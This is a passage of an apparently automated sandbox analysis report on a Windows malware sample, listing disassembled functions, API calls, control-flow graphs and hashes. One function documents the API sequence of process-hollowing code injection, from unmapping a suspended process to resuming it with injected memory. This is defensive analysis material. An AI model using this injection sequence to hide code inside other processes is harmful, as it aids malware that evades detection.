                                                                                                                                                                                                                                        control_flow_graph 450 cb4419-cb4432 451 cb4434-cb4436 450->451 452 cb4438 451->452 453 cb443d-cb4449 CreateToolhelp32Snapshot 451->453 452->453 454 cb444b-cb4451 453->454 455 cb4459-cb4466 Module32First 453->455 454->455 460 cb4453-cb4457 454->460 456 cb4468-cb4469 call cb40d8 455->456 457 cb446f-cb4477 455->457 461 cb446e 456->461 460->451 460->455 461->457
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00CB4441
                                                                                                                                                                                                                                        • Module32First.KERNEL32(00000000,00000224), ref: 00CB4461
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000006.00000002.2358389618.0000000000CAD000.00000040.00000020.00020000.00000000.sdmp, Offset: 00CAD000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_cad000_gtdirat.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 3833638111-0
                                                                                                                                                                                                                                        • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                                                                                                                                        • Instruction ID: 1109eba89fd1809f113942c05c218024ab22a866c86523a8e329b038aeff8f3a
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5CF0F6322007106BDB243BF8A88CBEF72ECAF48724F100528E662914C1CB70ED054A60
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 00C70E0F Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 481 c70e0f-c70e24 SetErrorMode * 2 482 c70e26 481->482 483 c70e2b-c70e2c 481->483 482->483
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • SetErrorMode.KERNELBASE(00000400,?,?,00C70223,?,?), ref: 00C70E19
                                                                                                                                                                                                                                        • SetErrorMode.KERNELBASE(00000000,?,?,00C70223,?,?), ref: 00C70E1E
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000006.00000002.2358317151.0000000000C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00C70000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_c70000_gtdirat.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ErrorMode
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2340568224-0
                                                                                                                                                                                                                                        • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                                                                                                                                                        • Instruction ID: 80dc8b85e2d1271e798bebef2fee5b710cb4697e15a71cea907d5d5ce84b6f73
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5DD01232245228B7DB002A94DC09BCEBB1CDF09BA2F10C421FB0DE9080CBB09A4047EA
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 004019B2 Relevance: 1.3, APIs: 1, Instructions: 65sleepCOMMON
                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 500 4019b2-4019bb 501 4019c3-401a19 call 40125c Sleep call 4014de 500->501 502 4019cd 500->502 514 401a28-401a77 call 40125c 501->514 515 401a1b-401a23 call 4015d5 501->515 502->501 515->514
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • Sleep.KERNELBASE(00001388), ref: 00401A04
                                                                                                                                                                                                                                          • Part of subcall function 004015D5: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401697
                                                                                                                                                                                                                                          • Part of subcall function 004015D5: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004016C4
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000006.00000002.2357951026.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_400000_gtdirat.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CreateDuplicateObjectSectionSleep
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 4152845823-0
                                                                                                                                                                                                                                        • Opcode ID: 04f6897abb308126f470fd05014cf238183fa8e61674ddeb0717af411a121877
                                                                                                                                                                                                                                        • Instruction ID: 9535be6c36f98077632f4f02dfbdda9f19971c7bea6acc9325b6b8c563985b13
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 04f6897abb308126f470fd05014cf238183fa8e61674ddeb0717af411a121877
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: CD119EB530C204F7DB00AA959C92EBA32689B40754F304537F607B90F0E67D9A13EB6B
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 004019CC Relevance: 1.3, APIs: 1, Instructions: 59sleepCOMMON
                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 529 4019cc-401a19 call 40125c Sleep call 4014de 543 401a28-401a77 call 40125c 529->543 544 401a1b-401a23 call 4015d5 529->544 544->543
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • Sleep.KERNELBASE(00001388), ref: 00401A04
                                                                                                                                                                                                                                          • Part of subcall function 004015D5: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401697
                                                                                                                                                                                                                                          • Part of subcall function 004015D5: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004016C4
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000006.00000002.2357951026.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_400000_gtdirat.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CreateDuplicateObjectSectionSleep
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 4152845823-0
                                                                                                                                                                                                                                        • Opcode ID: 33c28c6db8310be9d0036b491102ae5ea51f8e5c4e2b4487472b9c1eca0431ce
                                                                                                                                                                                                                                        • Instruction ID: 9860b3adbb02253c11ca7fee9fca2776f08e165eea76d4ff876d2c90885662b8
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 33c28c6db8310be9d0036b491102ae5ea51f8e5c4e2b4487472b9c1eca0431ce
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: FD017C7630C204F7DB00AA819892EBA32649B40754F304577F607B90F0D63D9A13EB1B
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 004019BE Relevance: 1.3, APIs: 1, Instructions: 58sleepCOMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • Sleep.KERNELBASE(00001388), ref: 00401A04
                                                                                                                                                                                                                                          • Part of subcall function 004015D5: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401697
                                                                                                                                                                                                                                          • Part of subcall function 004015D5: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004016C4
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000006.00000002.2357951026.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_400000_gtdirat.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CreateDuplicateObjectSectionSleep
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 4152845823-0
                                                                                                                                                                                                                                        • Opcode ID: a7c3ad1862dbfc6de84a841be9cc81f89f6a2c5f1f8df06033d8068c45b7fee5
                                                                                                                                                                                                                                        • Instruction ID: 6ea748b5703c6c3cc47f97f8384fa15d7aaa85e5df960e900962d61b5b42e5e1
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a7c3ad1862dbfc6de84a841be9cc81f89f6a2c5f1f8df06033d8068c45b7fee5
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 20018E7630C204F7DB00AA819C92EBA32645B44754F204577F607B90F0D67D9A13EB1B
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 004019CF Relevance: 1.3, APIs: 1, Instructions: 54sleepCOMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • Sleep.KERNELBASE(00001388), ref: 00401A04
                                                                                                                                                                                                                                          • Part of subcall function 004015D5: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401697
                                                                                                                                                                                                                                          • Part of subcall function 004015D5: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004016C4
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000006.00000002.2357951026.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_400000_gtdirat.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CreateDuplicateObjectSectionSleep
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 4152845823-0
                                                                                                                                                                                                                                        • Opcode ID: 0cae673df1dcccc298252c6cb1d087753a000ea560dbf3a75727c984865d924c
                                                                                                                                                                                                                                        • Instruction ID: 1dabb258173db235a1d95cfc95eeffc66b9799adec5ca63ac31477e601607a68
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0cae673df1dcccc298252c6cb1d087753a000ea560dbf3a75727c984865d924c
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7701D675308204F7DB00ABD08C81AAE32689F40314F708177F613B81F0EA3D8612EB5B
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 004019E7 Relevance: 1.3, APIs: 1, Instructions: 48sleepCOMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • Sleep.KERNELBASE(00001388), ref: 00401A04
                                                                                                                                                                                                                                          • Part of subcall function 004015D5: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401697
                                                                                                                                                                                                                                          • Part of subcall function 004015D5: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004016C4
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000006.00000002.2357951026.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_400000_gtdirat.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CreateDuplicateObjectSectionSleep
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 4152845823-0
                                                                                                                                                                                                                                        • Opcode ID: 188fd4d8d6eee7cd557e4d10eb30fffa0ab7ddb0591dde503fad6877693a3d2c
                                                                                                                                                                                                                                        • Instruction ID: 9426f979ca713991860f9ea44d55cd4c2553d935c0e8181050f05289ed5f003d
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 188fd4d8d6eee7cd557e4d10eb30fffa0ab7ddb0591dde503fad6877693a3d2c
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D401A776309204FBDB00AA959C41AAE37689F45310F204477F607B80F1E67D9A12AB2B
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 00CB40D8 Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 00CB4129
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000006.00000002.2358389618.0000000000CAD000.00000040.00000020.00020000.00000000.sdmp, Offset: 00CAD000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_cad000_gtdirat.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: AllocVirtual
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 4275171209-0
                                                                                                                                                                                                                                        • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                                                                                                                                        • Instruction ID: 35b9ae8d5f9d495c003bc24745dab9aaed940030636733cff8ab65cd21ad844e
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E6113C79A00208EFDB01DF98C985E99BFF5AF08351F058094F9489B362D375EA90EF90
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Execution Graph

                                                                                                                                                                                                                                        Execution Coverage:1.1%
                                                                                                                                                                                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                        Signature Coverage:28.9%
                                                                                                                                                                                                                                        Total number of Nodes:38
                                                                                                                                                                                                                                        Total number of Limit Nodes:8
                                                                                                                                                                                                                                        execution_graph 33916 2870000 33919 2870630 33916->33919 33918 2870005 33920 287064c 33919->33920 33922 2871577 33920->33922 33925 28705b0 33922->33925 33928 28705dc 33925->33928 33926 28705e2 GetFileAttributesA 33926->33928 33927 287061e 33928->33926 33928->33927 33930 2870420 33928->33930 33931 28704f3 33930->33931 33932 28704ff CreateWindowExA 33931->33932 33933 28704fa 33931->33933 33932->33933 33934 2870540 PostMessageA 33932->33934 33933->33928 33935 287055f 33934->33935 33935->33933 33937 2870110 VirtualAlloc GetModuleFileNameA 33935->33937 33938 2870414 33937->33938 33939 287017d CreateProcessA 33937->33939 33938->33935 33939->33938 33941 287025f VirtualFree VirtualAlloc Wow64GetThreadContext 33939->33941 33941->33938 33942 28702a9 ReadProcessMemory 33941->33942 33943 28702e5 VirtualAllocEx NtWriteVirtualMemory 33942->33943 33944 28702d5 NtUnmapViewOfSection 33942->33944 33945 287033b 33943->33945 33944->33943 33946 2870350 NtWriteVirtualMemory 33945->33946 33947 287039d WriteProcessMemory Wow64SetThreadContext ResumeThread 33945->33947 33946->33945 33948 28703fb ExitProcess 33947->33948 33950 27d0026 33951 27d0035 33950->33951 33954 27d07c6 33951->33954 33956 27d07e1 33954->33956 33955 27d07ea CreateToolhelp32Snapshot 33955->33956 33957 27d0806 Module32First 33955->33957 33956->33955 33956->33957 33958 27d0815 33957->33958 33960 27d003e 33957->33960 33961 27d0485 33958->33961 33962 27d04b0 33961->33962 33963 27d04f9 33962->33963 33964 27d04c1 VirtualAlloc 33962->33964 33963->33963 33964->33963

                                                                                                                                                                                                                                        Executed Functions

                                                                                                                                                                                                                                        Function 02870110 Relevance: 22.7, APIs: 15, Instructions: 248memorynativethreadCOMMON
                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • VirtualAlloc.KERNELBASE(00000000,00002800,00001000,00000004), ref: 02870156
                                                                                                                                                                                                                                        • GetModuleFileNameA.KERNELBASE(00000000,?,00002800), ref: 0287016C
                                                                                                                                                                                                                                        • CreateProcessA.KERNELBASE(?,00000000), ref: 02870255
                                                                                                                                                                                                                                        • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 02870270
                                                                                                                                                                                                                                        • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 02870283
                                                                                                                                                                                                                                        • Wow64GetThreadContext.KERNEL32(00000000,?), ref: 0287029F
                                                                                                                                                                                                                                        • ReadProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 028702C8
                                                                                                                                                                                                                                        • NtUnmapViewOfSection.NTDLL(00000000,?), ref: 028702E3
                                                                                                                                                                                                                                        • VirtualAllocEx.KERNELBASE(00000000,?,?,00003000,00000040), ref: 02870304
                                                                                                                                                                                                                                        • NtWriteVirtualMemory.NTDLL(00000000,?,?,00000000,00000000), ref: 0287032A
                                                                                                                                                                                                                                        • NtWriteVirtualMemory.NTDLL(00000000,00000000,?,00000002,00000000), ref: 02870399
                                                                                                                                                                                                                                        • WriteProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 028703BF
                                                                                                                                                                                                                                        • Wow64SetThreadContext.KERNEL32(00000000,?), ref: 028703E1
                                                                                                                                                                                                                                        • ResumeThread.KERNELBASE(00000000), ref: 028703ED
                                                                                                                                                                                                                                        • ExitProcess.KERNEL32(00000000), ref: 02870412
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.2820403987.0000000002870000.00000040.00001000.00020000.00000000.sdmp, Offset: 02870000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_2870000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Virtual$MemoryProcess$AllocThreadWrite$ContextWow64$CreateExitFileFreeModuleNameReadResumeSectionUnmapView
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 93872480-0
                                                                                                                                                                                                                                        • Opcode ID: ec80134effe49fee59cfb16798ca45a1398515b3278bf894a8b0bf22fdce02bc
                                                                                                                                                                                                                                        • Instruction ID: 31fb44aa0bb03ab45e5de445d38d54a259b14e511f7535b6c177b28a2c1f5c12
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ec80134effe49fee59cfb16798ca45a1398515b3278bf894a8b0bf22fdce02bc
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 62B1B674A00208AFDB44CF98C895F9EBBB5BF88314F248158E509AB391D771AE41CF94
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 02870420 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 113COMMON
                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 15 2870420-28704f8 17 28704ff-287053c CreateWindowExA 15->17 18 28704fa 15->18 20 2870540-2870558 PostMessageA 17->20 21 287053e 17->21 19 28705aa-28705ad 18->19 22 287055f-2870563 20->22 21->19 22->19 23 2870565-2870579 22->23 23->19 25 287057b-2870582 23->25 26 2870584-2870588 25->26 27 28705a8 25->27 26->27 28 287058a-2870591 26->28 27->22 28->27 29 2870593-2870597 call 2870110 28->29 31 287059c-28705a5 29->31 31->27
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • CreateWindowExA.USER32(00000200,saodkfnosa9uin,mfoaskdfnoa,00CF0000,80000000,80000000,000003E8,000003E8,00000000,00000000,00000000,00000000), ref: 02870533
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.2820403987.0000000002870000.00000040.00001000.00020000.00000000.sdmp, Offset: 02870000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_2870000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CreateWindow
                                                                                                                                                                                                                                        • String ID: 0$d$mfoaskdfnoa$saodkfnosa9uin
                                                                                                                                                                                                                                        • API String ID: 716092398-2341455598
                                                                                                                                                                                                                                        • Opcode ID: bb9b397fb3b679a7694c33bc0dbf232ca5c2d59a4e09fc52e4db1d59d2773c33
                                                                                                                                                                                                                                        • Instruction ID: ff9dc8a76bb6354d6357193358a9766552110ade507663639ee1671ae2554456
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: bb9b397fb3b679a7694c33bc0dbf232ca5c2d59a4e09fc52e4db1d59d2773c33
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0D511A74D08388DEEB11CBD8C849BDDBFB26F11708F144058D5487F286C3BA9658CBA6
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 028705B0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35COMMON
                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 32 28705b0-28705d5 33 28705dc-28705e0 32->33 34 28705e2-28705f5 GetFileAttributesA 33->34 35 287061e-2870621 33->35 36 28705f7-28705fe 34->36 37 2870613-287061c 34->37 36->37 38 2870600-287060b call 2870420 36->38 37->33 40 2870610 38->40 40->37
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • GetFileAttributesA.KERNELBASE(apfHQ), ref: 028705EC
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.2820403987.0000000002870000.00000040.00001000.00020000.00000000.sdmp, Offset: 02870000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_2870000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: AttributesFile
                                                                                                                                                                                                                                        • String ID: apfHQ$o
                                                                                                                                                                                                                                        • API String ID: 3188754299-2999369273
                                                                                                                                                                                                                                        • Opcode ID: af0d3c0451304eea9a95bfbcf33a37b8699cda851cd8c30db079f59d0d7bd2d6
                                                                                                                                                                                                                                        • Instruction ID: d8b7be7265b8a68bc02ff7e265d304961fe6c3efa539bff228921eb53e5c6b30
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: af0d3c0451304eea9a95bfbcf33a37b8699cda851cd8c30db079f59d0d7bd2d6
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: DB011E74C0425CEADB10DBD8C5583AEBFB5AF41309F148099C4096B242D7769B98CBA2
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 027D07C6 Relevance: 3.0, APIs: 2, Instructions: 41processCOMMON
                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 41 27d07c6-27d07df 42 27d07e1-27d07e3 41->42 43 27d07ea-27d07f6 CreateToolhelp32Snapshot 42->43 44 27d07e5 42->44 45 27d07f8-27d07fe 43->45 46 27d0806-27d0813 Module32First 43->46 44->43 45->46 51 27d0800-27d0804 45->51 47 27d081c-27d0824 46->47 48 27d0815-27d0816 call 27d0485 46->48 52 27d081b 48->52 51->42 51->46 52->47
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 027D07EE
                                                                                                                                                                                                                                        • Module32First.KERNEL32(00000000,00000224), ref: 027D080E
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.2820341095.00000000027D0000.00000040.00000020.00020000.00000000.sdmp, Offset: 027D0000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_27d0000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 3833638111-0
                                                                                                                                                                                                                                        • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                                                                                                                                        • Instruction ID: 67c921f9241e738c9550ceb3616e0b7f1cdf3a2cf4bb5e4aa8eef39279360f4d
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 28F096316007156FD7203BF5A88EB6F76F8BF49725F101528E643950C0DB70E8454A61
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 027D0485 Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON
                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 54 27d0485-27d04bf call 27d0798 57 27d050d 54->57 58 27d04c1-27d04f4 VirtualAlloc call 27d0512 54->58 57->57 60 27d04f9-27d050b 58->60 60->57
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 027D04D6
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.2820341095.00000000027D0000.00000040.00000020.00020000.00000000.sdmp, Offset: 027D0000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_27d0000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: AllocVirtual
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 4275171209-0
                                                                                                                                                                                                                                        • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                                                                                                                                        • Instruction ID: 6ef78ff96eea3cfa783a5251d7cc23160663d378b7979b0ec3ce68780c684cdf
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: DF113C79A00208EFDB01DF98C985E99BBF5EF08350F058094F9489B361D371EA90DF90
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Non-executed Functions

                                                                                                                                                                                                                                        Function 0288F030 Relevance: 19.9, APIs: 10, Strings: 1, Instructions: 696COMMON
                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
